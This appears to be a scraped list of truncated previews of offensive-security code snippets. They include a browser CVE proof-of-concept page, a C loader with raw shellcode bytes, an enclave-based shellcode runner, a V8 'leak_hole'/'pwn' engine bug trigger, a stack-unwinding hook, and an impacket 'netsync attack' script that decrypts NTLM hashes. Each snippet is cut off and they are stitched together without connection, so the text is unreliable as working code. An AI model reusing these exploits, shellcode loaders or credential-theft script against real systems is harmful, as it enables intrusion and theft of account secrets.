| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <title>CVE-2025-6558 PoC</title> | |
| </head> | |
| <body> | |
| <canvas id="canvas" width="480" height="640"></canvas> | |
| <script> | |
| function tf_bug() { |
| import argparse | |
| import datetime | |
| import logging | |
| import os | |
| import random | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| from six import ensure_binary |
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
| #include <windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #pragma comment(lib, "ntdll.lib") | |
// NT-namespace form of a path to one file on a specific user's desktop (hard-coded).
// Presumably the file the program reads, going by the macro name; the rest of the program is not visible here.
| #define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt" | |
// Hand-written prototype for the native NtOpenFile routine; the ntdll.lib pragma above supplies the import at link time.
| EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions); |
| #include <stdio.h> | |
| #include <windows.h> | |
| // Shellcode template from: https://gist.github.com/kkent030315/b508e56a5cb0e3577908484fa4978f12 | |
| // Compile using: x86_64-w64-mingw32-gcc -m64 enclave.c -o enclace.exe -lntdll | |
| EXTERN_C NTSYSAPI | |
| NTSTATUS | |
| NTAPI LdrCallEnclave( | |
| _In_ PENCLAVE_ROUTINE Routine, |
| import argparse | |
| import datetime | |
| import logging | |
| import os | |
| import random | |
| import struct | |
| import sys | |
| from binascii import hexlify, unhexlify | |
| from six import ensure_binary |
// Snippet exercising temporal-dead-zone (TDZ) handling of the block-scoped `y`.
// `x` is undefined, so the optional chain `x?.[y]?.a` short-circuits and `[y]` is never evaluated.
// `return y` then reads `y` before its `let` declaration has executed; a spec-compliant engine
// must throw a ReferenceError at that point instead of returning a value.
// NOTE(review): the function name implies that an engine which skips this check hands back an
// internal sentinel ("hole"). The affected engine and version are not stated in this preview; confirm
// against the original advisory before using this as a regression test.
| function leak_hole() { | |
| let x; | |
| delete x?.[y]?.a; | |
| return y; | |
| let y; | |
| } | |
// Calls leak_hole() and prints whatever it returned with %DebugPrint.
// %DebugPrint is V8 natives syntax: it only parses when the engine runs with --allow-natives-syntax,
// which is not enabled by default, so this is a debug-shell check of the returned value and nothing more.
// On an engine that enforces the TDZ check, leak_hole() throws and the print is never reached.
| function pwn() { | |
| let hole = leak_hole(); | |
| %DebugPrint(hole); | |
| } |
| // Return, but across multiple frames. | |
| // | |
| // This function unwinds the given number of frames, then sets the return value provided, emulating as if this number | |
| // of functions returned, with the last one returning the value provided in RetVal. Can be used to hook a callee when | |
| // you don't have a convenient way to hook it directly and actually just want to stub it out with a return value. | |
| // | |
| // @param FramesToSkip The number of frames to skip, starting from the current frame. | |
| // @param RetVal The value to return from the last frame. | |
| // @param Context Context to start from, in case you want to SuperReturn from somewhere deeper. | |
| DECLSPEC_NOINLINE void SuperReturn( |
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse | |
| # This script performs a netsync attack. No SMB involved | |
| # My first idea was to only use netlogon SSP, however SAMR seems not compatible |
| /** | |
| Compile with your C console project. | |
| */ | |
| #include <stdio.h> | |
| #include <windows.h> | |
// Application-kind codes (unknown / console / GUI); where they are consumed is not visible in this preview.
// NOTE(review): identifiers that begin with a double underscore are reserved for the implementation in C;
// unprefixed names would avoid a clash with compiler or SDK macros.
| #define __UNKNOWN_APP 0 | |
| #define __CONSOLE_APP 1 | |
| #define __GUI_APP 2 |